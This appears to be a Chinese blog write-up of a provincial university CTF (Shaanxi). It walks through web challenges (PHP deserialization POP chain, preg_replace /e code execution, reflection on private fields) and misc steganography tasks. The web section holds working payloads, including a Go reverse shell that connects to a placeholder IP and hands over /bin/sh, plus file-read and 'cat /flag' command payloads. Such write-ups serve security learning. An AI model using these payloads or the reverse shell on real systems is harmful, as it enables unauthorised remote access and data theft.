本文最后更新于:2023年10月8日 下午
[TOC]
第三届陕西省大学生网络安全技能大赛wp
web
ezpop
在源码找到base64
data:image/s3,"s3://crabby-images/1946d/1946d2dcca011dde8d0d1d410d3dfb8118ec8f40" alt="image-20230608202614434"
解码: /pop3ZTgMw.php
,访问获得源码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60
| <?php highlight_file(__FILE__);
class night { public $night;
public function __destruct(){ echo $this->night . '哒咩哟'; } }
class day { public $day;
public function __toString(){ echo $this->day->go(); }
public function __call($a, $b){ echo $this->day->getFlag(); } }
class light { public $light;
public function __invoke(){ echo $this->light->d(); } }
class dark { public $dark;
public function go(){ ($this->dark)(); }
public function getFlag(){ include(hacked($this->dark)); } }
function hacked($s) { if(substr($s, 0,1) == '/'){ die('呆jio步'); } $s = preg_replace('/\.\.*/', '.', $s); $s = urldecode($s); $s = htmlentities($s, ENT_QUOTES, 'UTF-8'); return strip_tags($s); }
$un = unserialize($_POST['快给我传参pop']); throw new Exception('seino');
|
突破点在dark类的getFlag方法,里面有个include可以文件包含,可以使用php伪协议绕过hacked函数
很简单直接构造poc
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
| $a=new dark(); $a->dark="php://filter/convert.base64-encode/resource=/flag"; $b=new day(); $b->day=$a; $c=new light(); $c->light=$b; $d=new dark(); $d->dark=$c; $e=new day(); $e->day=$d; $n=new night(); $n->night=$e; echo serialize($n);
O:5:"night":1:{s:5:"night";O:3:"day":1:{s:3:"day";O:4:"dark":1:{s:4:"dark";O:5:"light":1:{s:5:"light";O:3:"day":1:{s:3:"day";O:4:"dark":1:{s:4:"dark";s:49:"php://filter/convert.base64-encode/resource=/flag";}}}}}}
|
data:image/s3,"s3://crabby-images/aa105/aa1057491f95eaa82d06a951db08577beacdf928" alt="image-20230608202830909"
我们把源码复制进phpstorm发现有点小问题:
data:image/s3,"s3://crabby-images/e3d5d/e3d5df532d3ef3d5018907fac2584a0cf41f2edf" alt="image-20230608202918528"
post参数变了,
可能是不可见字符搞的鬼,我们需要将这些字符进行url编码再传参
post传参:
1
| %E2%80%AE%E2%81%A6%E5%BF%AB%E7%BB%99%E6%88%91%E4%BC%A0%E5%8F%82%E2%81%A9%E2%81%A6pop
|
但是传参发现没用:
data:image/s3,"s3://crabby-images/9fa8d/9fa8d16c773d151027516d7db5cc65fa8ea123da" alt="image-20230608205521106"
因为这里抛出了一个异常,导致destruct方法没有被触发,
我们可以使用 fast destruct
技巧提前触发 __destruct()
这里我们可以删除最后一个大括号 }
:得到flag的base64编码
data:image/s3,"s3://crabby-images/7f050/7f0500e7667a6fcf5d5b0fac8bea43e1f75ae2b9" alt="image-20230608205925122"
本质上,fast destruct 是因为unserialize过程中扫描器发现序列化字符串格式有误导致的提前异常退出,为了销毁之前建立的对象内存空间,会立刻调用对象的__destruct()
,提前触发反序列化链条。
test
data:image/s3,"s3://crabby-images/dfb92/dfb927d8be1f560a2860487e4be44135c0ede4f6" alt="image-20230608210238283"
f12找到隐藏页面:
data:image/s3,"s3://crabby-images/2e15b/2e15b401beabb4a6684a630ef22a103884171ac8" alt="image-20230608210301665"
我们把index改为admin:
data:image/s3,"s3://crabby-images/8d6c8/8d6c8a83c1a43df48c4a27aa39443b3c74c81494" alt="image-20230608210329993"
md5解码得到:
data:image/s3,"s3://crabby-images/3be1a/3be1aee7a8dcf9da6ef8e209c91d42e11e9ddb74" alt="image-20230608210346210"
使用账号密码登录:
data:image/s3,"s3://crabby-images/a3241/a32415d170b6214b1e0292003ff304683f7cbb51" alt="image-20230608210421587"
提示我们上传go文件后就会执行它,所以我们直接反弹shell
反弹shell go脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39
| package main
import ( "fmt" "net" "os/exec" )
func main() { conn, err := net.Dial("tcp", "your_ip:9996") if err != nil { panic(err) }
cmd := exec.Command("/bin/sh") cmd.Stdin = conn cmd.Stdout = conn cmd.Stderr = conn
err = cmd.Start() if err != nil { panic(err) }
err = cmd.Wait() if err != nil { panic(err) } conn.Close()
fmt.Println("Shell session terminated") }
|
构造上传页面
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> </head> <body> <form action="http://d5e624ee.clsadp.com/Adm1nUp104d" method="post" enctype="multipart/form-data"> <input type="file" name="file"> <input type="submit" name="submit"> </form> </body> </html>
|
上传脚本,服务器监听:
data:image/s3,"s3://crabby-images/39d37/39d3760c5dffc325b4454416fe5db604bdd92e02" alt="image-20230608210954717"
ezrce
按一下提交得源码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| <?php error_reporting(0); include 'waf.php'; header("Content-Type:text/html;charset=utf-8"); echo "你是谁啊哥们?把钥匙给我!!!!<br/>"; $key=$_GET['key']; $name=$_POST['name']; $qaq=waf($_POST['qaq']); if (isset($_GET['key'])){ highlight_file(__FILE__); } if (isset($name)) { echo "你是".$name."大人????<br/>"; $name1=preg_replace('/hahaha/e',$qaq,$name); echo "骗我的吧,你明明是 >>>>小小".$name1; } ?>
|
注意看:preg_replace('/hahaha/e',$qaq,$name)
使用了 /e
参数,可能造成命令执行
preg_replace()使用了 /e
参数,如果在 $name中匹配到了 hahaha
就会执行 $qaq中的代码
当前目录存在 waf.php
data:image/s3,"s3://crabby-images/796b6/796b6e836b6785c78b9f11a736942bf84113c101" alt="image-20230608211814177"
试了一下,发现 小数点 / 等东西都被过滤了,可以使用 无参数rce
1
| name=hahaha123&qaq=highlight_file(array_pop(scandir(current(localeconv()))))
|
获得waf.php函数
1 2 3 4 5 6 7 8
| function waf($poc) { if(preg_match("/[0-9]|get_defined_vars|getallheaders|next|prev|end|array_reverse|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $poc)){ echo "hacker! you die!<br/>"; return "666"; } return $poc; }
|
写到这有点不会了,查了一下无参数rce还有一种 session_start()
的方式
data:image/s3,"s3://crabby-images/c831c/c831c355da1ba28dbbe1ecfd13f682b0ea8a5bc8" alt="image-20230608212131882"
使用session将 /flag
传过去:
data:image/s3,"s3://crabby-images/a31c2/a31c2c3657c54f3400c0179a31da039fb49fca28" alt="image-20230608212232667"
unserialize
index.php:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| <?php highlight_file(__FILE__); header("Content-type:text/html;charset=utf-8"); require_once "waf.php"; error_reporting(0); class getFlag{ private $password; private $cmd; public function __destruct(){ if($this->password==" //how to change the private variablessecret"){ system($this->cmd); } } } $a = $_GET['a']; if(isset($_GET['a'])){ @eval(waf($a)); } ?>
|
robots.txt泄露:
1 2
| User-agent: * Disallow: hint.php
|
我们访问hint.php
data:image/s3,"s3://crabby-images/c808a/c808aae76bad8a40281965a4971d0ff269303f47" alt="image-20230608212751510"
提示我们需要使用这些方法,结合
data:image/s3,"s3://crabby-images/047bc/047bcf7e9832ea5fd5f560b13454c4c39e309fac" alt="image-20230608212844259"
我们知道了,我们需要使用反射,将源码复制到sublime中:
data:image/s3,"s3://crabby-images/310ef/310ef3b46fbf5aca0d50b2dd9a6912d309a5d60e" alt="image-20230608212931976"
发现参数又有不可见字符,我们需要url编码:
1
| %E2%80%AE%E2%81%A6%20%20%2F%2Fhow%20to%20change%20the%20private%20variables%E2%81%A9%E2%81%A6secret
|
直接使用反射即可,注意:由于属性是private,所以我们需要 setAccessible(true)
1 2 3 4 5 6 7 8
| $flag = new getFlag(); $refl = new ReflectionObject($flag); $pwd = $refl->getProperty("password"); $pwd->setAccessible(true); $pwd->setValue($flag,"%E2%80%AE%E2%81%A6%20%20%2F%2Fhow%20to%20change%20the%20private%20variables%E2%81%A9%E2%81%A6secret"); $cmd = $refl->getProperty("cmd"); $cmd->setAccessible(true); $cmd->setValue($flag,"cat /flag");
|
data:image/s3,"s3://crabby-images/1d804/1d80435b993924988bdf478566748edda5fa26c1" alt="image-20230608213943302"
Esc4pe_T0_Mong0
nodejs、沙箱逃逸
misc
管道
zsteg一把梭
data:image/s3,"s3://crabby-images/5b464/5b464a772237fcbe75351071a494286e4a6c43e7" alt="image-20230608214440271"
可是雪啊飘进双眼
把音频放进audacity
data:image/s3,"s3://crabby-images/22cd0/22cd05fc73c823c3cec679150dd14ed2b349b457" alt="img"
这是莫斯电码,解码
1 2
| .-- --- .- .. ... .... .- -. -..- .. WOAISHANXI
|
然后结合 题目知,这是snow隐写:
data:image/s3,"s3://crabby-images/5bb1a/5bb1a5f250797122ad4e1237dc03933c5826fd8f" alt="image-20230608214844634"
shanxiroujiamo
解压压缩包,得到两张图片
data:image/s3,"s3://crabby-images/64020/64020e4088d4230d6a4a21d194acb9b0713c5343" alt="image-20230608215116631"
data:image/s3,"s3://crabby-images/4d96a/4d96ae6c46f982430dd400b358343b500fabc17d" alt="image-20230608214954094"
binwalk分离 key.jpg,得到另一张图片:
对照着上面的图片解密:BC1PVEYD
然后使用steghide即可:
data:image/s3,"s3://crabby-images/65b81/65b81b9dff48c9078f882d83482a6fcc5c4582b2" alt="image-20230608215152687"